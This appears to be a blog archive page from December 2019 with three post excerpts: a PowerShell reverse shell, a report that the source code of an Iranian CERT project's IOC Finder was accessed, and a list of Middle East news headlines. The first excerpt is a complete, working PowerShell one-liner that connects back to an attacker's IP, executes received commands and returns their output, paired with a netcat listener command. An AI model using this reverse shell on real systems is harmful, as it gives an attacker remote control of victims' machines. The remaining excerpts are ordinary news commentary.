Month: December 2019

The command For Powershell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ip attacker',portnumber);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ------------------------ The Comamnd For netcat listen nc -l -p 4444 -vv

Read More

The ‘highly touted’ #Iranian CERT IOC Finder دژفا

دژفا, Dezfa (Dejfa), or "IT fort," is the name of a project that was supposed to protect Irans information security and digital infrastructure and act as a "national information network security shield". Now a user has accessed the skilled site by accessing the IOC Finder source code which you can see in the image below. "When digital services are developed, the likelihood of disruption to service systems is even greater," said Mr. Jahromi, May 98…

Read More

Happenings in the Middle East

1- US military commanders warn of Iran's tense movements and the possibility of attacking US interests in the region by Iran 2- Paying attention to the protests in Iran and continuing the protests in Lebanon and Iraq 3. Israeli Prime Minister's call for full pressure on the Iranian people and praise the protests in Iran, Lebanon and Iraq 4- Israeli attack on ammunition slum in Syria 5. Seizure of Iranian ship by US, claiming to…

Read More